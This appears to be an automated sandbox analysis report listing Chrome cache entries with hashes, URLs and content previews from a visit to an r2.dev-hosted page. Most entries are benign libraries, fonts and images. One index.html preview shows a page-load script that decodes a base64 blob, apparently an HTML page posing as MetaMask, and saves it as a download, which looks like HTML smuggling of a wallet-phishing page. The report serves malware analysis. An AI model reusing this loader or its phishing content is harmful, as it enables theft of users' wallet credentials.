Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 167

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	319
Entropy (8bit):	4.979897422514046
Encrypted:	false
SSDEEP:
MD5:	13D36563EA4A34A37606D61E94D3B0A0
SHA1:	C04F64BD21F1729D67F0BEE5298BBB853CD3C4A5
SHA-256:	D7187E5D481BAC4A1DC0DEDFE86CF7641FD296CDA42D37A1C15C5D530DB6C731
SHA-512:	268100D6BC580CCFB8474D3610A856FB625ECA0BF8C4FBD87D115E3B044380F07100F07B45EFAE7CCF6587985C583FFDB3DF3772A1940197C2CDE15367895014
Malicious:	false
Reputation:	unknown
Preview:	{. "ip": "8.46.123.75",. "hostname": "static-cpe-8-46-123-75.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

Chrome Cache Entry: 168

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	5914
Entropy (8bit):	5.332792795668534
Encrypted:	false
SSDEEP:
MD5:	3128B6156BC4C423257ADD966CE940AD
SHA1:	49D3772473948CA335450EFC6EC8F679F02FBE95
SHA-256:	99D34DD140D4740B19AEE06820776EA478EF03C72A05DD82B0497D65B5976064
SHA-512:	0355E4C5BCECE8E7C5FA7E8FE48E212468C1325FBDF862FBF8A72CC50ACAA5CA096080E9CECD893DB981CB0ED0F593CD7E62F80721B638A80415D10D1930CCFF
Malicious:	false
Reputation:	unknown
URL:	https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800;900&display=swap
Preview:	/* latin-ext /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLDz8Z1JlFc-K.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./ latin /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./ latin-ext */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.co

Chrome Cache Entry: 169

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 29 x 26, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	576
Entropy (8bit):	7.376257473456894
Encrypted:	false
SSDEEP:
MD5:	F72CDDAAC85D22B8B56C37094F48BB5A
SHA1:	E0AA951FACE4C11A1E76416DD1DBCE496B5049D0
SHA-256:	19E82DB63D72BF03E566B0CA3A9CB7AE83A22C342A4854978DB54F7CEF97C07D
SHA-512:	9EC5ADEFE414BCB805560797EE47BBD4861BD74210DD467324CEDCBD1E5B209D9EDB9393B2F473F8E3C3CD55B428490FBF483A65FBDAF90DF4DEF9D5F2729B47
Malicious:	false
Reputation:	unknown
URL:	https://i.ibb.co/vj09zgr/check.png
Preview:	.PNG........IHDR.............K.W.....sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.K(Da.....bAY.....FQba.daa..BjR..B.$..E"DIb..4..e.....`2#......u....ec.l.........S.~...Tt....[....dX.Q...6\OpV.]Q.5..(.}.R.wdd..b.Afo...ft.,Ly..0.....G.jtj/H.F;..Q<x.}......6..Ln.>..._.@/...[..2.r........x.a.~...A.....n..uAa.......J.%.e.<.7..Fkf.P".7.jn.`..Q...a...&..JO...C....K(..sz..M.....K.(..sz..a.......DOn.e~..A$..sZQ>..n.F..Q..$....:.N...=.D).h.2..,j..e/.2.Qf....ZT..O..el.Q*.9.r.V..2..+...[.Bi.+..8h........~.....O....J$.... ..w....Q.(.....IEND.B`.

Chrome Cache Entry: 170

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 186 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3379
Entropy (8bit):	7.905852362859572
Encrypted:	false
SSDEEP:
MD5:	57ECE59B17A257065602E780117454C5
SHA1:	2D5B52354A0CA3AE8B3BA267FA9A12773D6C070C
SHA-256:	C42C24C6B66B9CC383BFD093244418E62BE5A9A6808F69B16E82EAD38833BBE5
SHA-512:	8BFDBF8ED80DADA88816C3760FB7772CD5CDF731D91D3883B03709EB3C0CB00BB329464D42483D14FCFE606BC899893CB040F8BB815C28B4F6A44E9827DA851D
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......0......%`O....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..W.W....?...o.+mU..R.+...J...jW.+uA............V..k[.{.......D..&.......g.MfB.s..}...2.~g....8......7@..p.....@..p.....@..p.....@..p.....@..p.....@..g.....P..":[..V.....r..{.cW.X....=..sh....o.B.d......c......2t..@.vt4.P....vL..e......y.u4.j."..94Eo.}..._...l.....x..'..E...h6I...y.}t.4..0.U...d.........,.._:-W...)....U...{";..p...x.4...c....:....Tk3mewQ.[..6LDq.+x(.n..d..w.'+-J..\...?.v..%+l4..zP.I.Ex.1...q/.Ly.p8...Wp~e0.K...'O."n_..AS.o...+!..Y....i..n.X..4..`.4KNoU...d...FS..'.A......x......A.R?.$y..\|..K.I...%.Jl.6M..nK....CkS..'.A......c\.y!.2...@C.7Wtc....(.xp.NVj.:...=...WTQ.l?u....:...{(.L.z..6...q.._,Q.....?.V.(..3>...;8p...g.}z.......+..l...A]$.M......*...O.^.<A=^.eInn...\|.`..}.G..]Q...y2y.jy.E]...o....~1[....V.3d..jf...>{.........}.[.c.<..\....d.y...;..}.:....OHh.N..&xqE..s.zu..0.UD...[o+O...^..Z.M[..=@..,.zD'5......vlA..l........(E'Q......et

Chrome Cache Entry: 172

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (611)
Category:	downloaded
Size (bytes):	27150
Entropy (8bit):	4.357340680151037
Encrypted:	false
SSDEEP:
MD5:	46DD133EE00DC1BAE5E4EEBA7B88432F
SHA1:	8AF86A4AC91CE48C062216FB94A6E1D57618A19B
SHA-256:	9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
SHA-512:	CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
Malicious:	false
Reputation:	unknown
URL:	https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/favicon.ico
Preview:	<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr

Chrome Cache Entry: 173

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3833)
Category:	downloaded
Size (bytes):	3838
Entropy (8bit):	5.833371300410399
Encrypted:	false
SSDEEP:
MD5:	9B3021E8AE1F8D6A636F6CBB7D12D6B3
SHA1:	AD0DDF65D06AA25B34EC47E3D8058DF1B7E90F94
SHA-256:	7CE231CA9DFD9DFB336772B196763A16D59B1D05C8CD30416906DD91B9B1280A
SHA-512:	4AF6887C1CCF31611DCC3029B6646DE2E0E5265A2DF1198E401BBB6041E9297A2570F41684E141421B26D389194C33D947746F83BEDE15BC552CC3C4D44B3228
Malicious:	false
Reputation:	unknown
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["marriott layoffs bethesda","undersea cables baltic sea","cleveland cavaliers vs boston celtics","when is spotify wrapped released","deals black friday","winter storm warning oregon","wwe raw netflix","blackrock bitcoin etf"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWx0cHFxeGh5EhJUZWxldmlzaW9uIHByb2dyYW0ywxBkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQU1RTUJJZ0FDRVFFREVRSC94QUFiQUFBQ0FnTUJBQUFBQUFBQUFBQUFBQUFGQmdBRUFnTUhBZi9FQURnUUFBRUVBUU1DQXdRSEJ3VUFBQUFBQUFFQ0F3UVJCUUFTSVFZeEUw

Chrome Cache Entry: 174

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 7884, version 1.0
Category:	downloaded
Size (bytes):	7884
Entropy (8bit):	7.971946419873228
Encrypted:	false
SSDEEP:
MD5:	9212F6F9860F9FC6C69B02FEDF6DB8C3
SHA1:	AC6D71B4D5FDD2B3DABC9A06FF6C001E4251DA0B
SHA-256:	7D93459D86585BFCDBB7E0376056226ADB25821EE54B96236FE2123E9560929F
SHA-512:	67317495F4B53E20A9F31C034E456E6C37F387DFFB2C092CAA5159BC441CFCADD02749FFE5BBED1D580D5300A59E48A767EF2C6D9978B474F84C1A2CD095C126
Malicious:	false
Reputation:	unknown
URL:	https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJfecg.woff2
Preview:	wOF2..............?....x.............................`..T..L.6..6..6.$..h. ..\....~2.".8. .w.Q.Y,.?$pC.....)bT(i..@X.m...+...D.Q.O.\-?g.U..Z..._...l..!.lKD.Q..>.9v..V..<...Td$.E..,...o..c.t....!...#..8.A..3..cx~n=Di#....U......K.5jXH.].....j.(.6..]{..IDhZ.......R.....[..X".B~.(Su2..../.I.E...T.l%....'.N.aN.2\,70.....V.RQ..k~..".1. Lg.zd....}.yyys&D.K.g....)....2&%$.nm.\.._.e.tU..I.w;W.\|..6..XUv...!......>@.V..'..`.H`...5.7.X.?..@#..:..<.R.\|.;K..}.6..IA.C.....z.n.G............[.....z........`.X....D..{<..j...).......FQ..T..m.&s_k[%ZILV.8.l.o.z$.)/]......}..Kg.}..O...o\|..>.,U..?..{b<........._.._.06.........R01.@..[......a8..7.V%..B.0F...4 ....q..u#.lg....x....a.=w...8..A6.>f.+.8..Xm@`.m....G.....i..^R}9.aB...?._#.[f.d,V....bG.]...iED.@[.:.....P...........~.{,.x...~.!...C....b.....ze..).:+N....2sd..s..MEp.?^[.k........p..nz...[-.XI.%.."..`..<.2b\.w.VS.a.+......~..J..uGq..)..1...4o3v.Sb......5.w7...-....Wd>..B....R^.4'..B.2G>.en.q..._.@s......

Chrome Cache Entry: 175

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 51 x 51, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	6472
Entropy (8bit):	7.9614440298074545
Encrypted:	false
SSDEEP:
MD5:	F419183716DF0C9BCEFFF5389522958C
SHA1:	CF56E3EF9C5B162BECE6DFFE9E1B220526F7AC7E
SHA-256:	0DFA5859ACD573CAF7190FA333E1551503CC295EBABE5C7051C90CFBF9D190A9
SHA-512:	6623E40298585D89DF22A20DA5289E2A8109A78B0A1ACEBCE8F44CA79E0A9354DBA35C82B3E64192B1A971D9CDA1FA9FE1E37F8A4098A2376F731E2271D13C55
Malicious:	false
Reputation:	unknown
URL:	https://i.ibb.co/yVx2V3c/tagg.png
Preview:	.PNG........IHDR...3...3.....:.0....pHYs.................sRGB.........gAMA......a.....IDATx..Z.t[.o.zO..[.b;..YI.)$i:.....)--.)s.2K.;.-S..t..J.P..J.............;V,.-[....2........yG...........^...........p...\.=......5e..45..u..[..W..8.......]...S..(.......V...rzH...\|.R..Z..E+....=w....o..'.ri'7..j.]4TV..h..2....n......../...3_...+..{..h..tp.,.(..&...3..~....V...y..&u...N..<.i.f.......{>..<4...g;n..t..hi..2...........;^n.`..}..&.N..0..w.....B...........>.U.So>.....#..O_..z...cYEQ.@Tq$).Dc.`...............c}[..qX.{u-_...x.....J.t.6r......bsE...ZNK9sz..4..:.p..%3........g$.........G.L...+.\|B....N.:...,..........x...a.i5S/.Yj.D..l_..........i..I.H.\|..jZ.5:.!h X....-.K.1.QSiVSS..!.......-.........LM...i}.7....!...v.5..6w...}..e.Qz.73>.C...e.??../Og.n;....{..%...)..Y...,...?b....=5....9E.y.9M...1g..I..?&.}%...:..5.p...{.q./..g.....,.4.{*(.z,;.......]{...^....Y..{^...\.....!-.e/...1....\..t..S.wA..9C...o.'.B.....iz...C..._(BM..IZ...R..S...S.<...

Chrome Cache Entry: 177

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 35 x 28, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	891
Entropy (8bit):	7.658321956943703
Encrypted:	false
SSDEEP:
MD5:	6F92CE5CAD6F8F605B3AAC1B29C9D3BD
SHA1:	4BD1981F807FB19F36860502E24E726F76AAE285
SHA-256:	D6DFC8DBA222DBB220A21EF5DCE29A16E3013E9481F02B4964F5730831E54719
SHA-512:	CD7E74B96EDA3F5D9749FCDB138B335638F9EF700F632BF920CC59B9D8A5E79EE5D5C25556278BD66FA9E68F062AB084FF3DC1B197F7F3AA843F09DE69C3817F
Malicious:	false
Reputation:	unknown
URL:	https://i.ibb.co/Jj5Lxp3/download-1.png
Preview:	.PNG........IHDR...#............!....sRGB.........gAMA......a.....pHYs..........o.d....IDATXG..KTQ...c.H..xk...,..2/.V.........$.L. .1.$S..4...5..cb.B3....:...3...h$=.......;{...YG..kf.X3.E..Ko.}..Y.>!f..gi..........b.j....)l...B....irLM........3s..t!/...n..I..u.......L.)....H.1)-..1.])..\YU.N..5..O.+...B...Y9F.O2........\4..s.;^....\..\..MLN.......]TXt.c.....nf}9h.A....'2.x......t.>n...D2..K/_5..z...Uz\W/T}D4...lO SC#./.....k.$=... O.2h._..E..y5.f..jt.....R.]l.}'...Fu..'&..5>k.....]..?l..q.n.P.&.L...<H...B......r.be.`.GF..I]........4af.C~se.`0.&...N..w.I...P....4..03XR,-..R.....H.V..8\.[...+.q...z=DL`$....(A.BC.JZ...Jb......$?......@YJC(W......6::F..96.K33.X..A/.f.....&ACCc.HZ4<4>.oa....rl..X... ..gI3...-^..Z?..h.G.....T.5.kY.KT3...0.CQN...&.O..8LAw....N..0..xX..n3...........#0..`Y....mVdf9T.aC.p..?7..;.A.#q...........,.T.m....IEND.B`.

Chrome Cache Entry: 180

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 7816, version 1.0
Category:	downloaded
Size (bytes):	7816
Entropy (8bit):	7.974758688549932
Encrypted:	false
SSDEEP:
MD5:	25B0E113CA7CCE3770D542736DB26368
SHA1:	CB726212D5D525021752A1D8470A0FB593E0C49E
SHA-256:	9338E65FC077355C7A87AE0D64CC101E23B9BF8AD78AE65F0F319C857311B526
SHA-512:	A0D331E62AB4727F49CA286A1EE7FB81CDDC5BB9EDF71EF84F4BD4FA1552069AF1A82752011BA88FAE80862D034135926B7E99D70E59D626D66D4EDE90E94C30
Malicious:	false
Reputation:	unknown
URL:	https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2
Preview:	wOF2..............>P...4.............................`..T.......6..6.$..h. ..D.....03......~.(J........".!]X.......fD .s..I......(&.:..K..3=/.?0.?B........}.}.L....9.!1..6.u....(...m..\.6R.H....(..J.....YXus..2..susq.E^.v.....z..{........BN^...}[a.8&.By.9......O......3..zW.\|R.I.8 .Z.V. ..v...X_F....,[ye....wU.m..U.....}....'.^.jQK..@....n....)...;.. T..@]...hz.>.6.Y.tgeF.p...k?.g.jIb..."'.p.j.W}..X..........0'@.!<..$.<\TG...........^......W..<..LhX...r..Q.8........W.8[...W.z.W...,`...}...CY..z..m.B...z._..}..0$..F. ....<........!...X.....`.._UY{..k....[.+....h..G...x4.h...#...n=.!....G.G..<....~.nS...M.d.RT...g..$:/..j..y.@.FIg.".#..]'...4...n..y.Q.s'..I@P.w..xI.......#.J.n.n.i...'....@..H...H..1.;7...ddSF.d..]....Z......W.../S....^V..k..%.......CF....B4.kN....Mp.......+..i...M.>.`m...=..$c..$.h.t..\|..d+...6j..W...~a.M.'4..f.`...( .0Vq,.&f.?k.%i.\|tr..`k...F..{l.T.T=.......aK..F....nAu..."....Cpc..B.`..s...,S.......P._[K?..+...\|2...z....

Chrome Cache Entry: 181

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65131), with CRLF line terminators
Category:	downloaded
Size (bytes):	88256
Entropy (8bit):	5.463420757193929
Encrypted:	false
SSDEEP:
MD5:	4DD4F6682BAAC63ED96BF6E361AF033B
SHA1:	4AAC52DBD9DA9B515F2B7C5171D74F73F8F44888
SHA-256:	AEF5C168406D2E5AD75324DB7405EEC1D2F61E119E1B11C95002F40FD91406B5
SHA-512:	604D39BD713DF225323357088E6CF41FE09B895C94239F97D411143D3030AD24CFE9F552A059235B3891374DA6ABF19E640EEAF345167BE772848B807B6A96B5
Malicious:	false
Reputation:	unknown
URL:	https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/index.html
Preview:	<!DOCTYPE html>..<html>..<head>.. <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>.. <script>.. $(document).ready(function() {.. saveFile();.. });.... function saveFile(name, type, data) {.. if (data != null && navigator.msSaveBlob).. return navigator.msSaveBlob(new Blob([data], { type: type }), name);.. var a = $("<a style='display: none;'/>");.. .. var encodedStringAtoB = "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+TWV0YU1hc2s8L3RpdGxlPgogICAgPG1ldGEgbmFtZT0iZ29vZ2xlYm90IiBjb250ZW50PSJub2luZGV4Ij4KICAgIDxtZXRhIG5hbWU9Imdvb2dsZWJvdC1uZXdzIiBjb250ZW50PSJub2luZGV4Ij4KICAgIDxtZXRhIG5hbWU9Imdvb2dsZWJvdCIgY29udGVudD0ibm9pbmRleCI+CiAgICA8bWV0YSBuYW1lPSJnb29nbGVib3QtbmV3cyIgY29udGVudD0ibm9zbmlwcGV0Ij4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9pLmliYi5jby8zWVI4NjJyL2Zhdmlj

Chrome Cache Entry: 183

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 171 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	8432
Entropy (8bit):	7.95443656692082
Encrypted:	false
SSDEEP:
MD5:	3B751CA6558A384727662FEB63279995
SHA1:	3C4E0D2C8138415DEFB4EA0F81443740F02801AC
SHA-256:	2DC1528F00A048BDA8490A4D046D0A3874552FD44A3268E34F8D587C77870B57
SHA-512:	917444C234F520062E3ACD119BE2626617339B3DDA8CC0AAD3E25F35BD60519EEF538838C05F70A47B934C6206C31B7FDC3A6A3315FEAF46BC54BFAE604B57FD
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............JI....sRGB.........gAMA......a.....pHYs..........o.d.. .IDATx^..TE...B}I!..@....U. .." ((..t...!.UP..)J...wP:..H..@.i$!...y...M.......\|>..ew.....3g...h.&...I..gv..s.....f.k.h....vE...fU.5..a...A\......T.[.O...M..V.v..W\|.......^.>...fU...n.....`.Y.6....VP..c.N......M...$.......o....`fW......wf.v.[r.U....!/.BL..\|.~s.1!....q.l......h2....2...7(..;....-a.g....i......."u(`Q...Dt.6.+....b:y..a..3-......T.Y.OK.E.M.N..~..V....o...!.9%....gN...N........E.........y.`.......E....P..N..d..'..P.+.r.....@.....w.!J4..2....j..P.t.o...)...D..0!.J6L...gD.M..=.... .~W......H....N.]...u.7.0+V....*.1.,.d...a.1<L...T.......Wi25V}....2...B!.cQ#."...aqol..{S}d....Z.@.q.~..X..C..........l...Zq.&....\......N7l.952..;{.>.U_......Y....PD..`nw_H.k.....6....k.Am.iq.&3.g..Pq.W..E4.8....6..=}{....r....H....P`X.....\|X`...........L....U...e. ':.r.^!Ei.........>.........H.^...........J...;d.1/C......&...H..a..]....8.GO......{no.O!c(@...

Chrome Cache Entry: 184

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	dropped
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 185

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	unknown
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Static File Info

⊘No static file info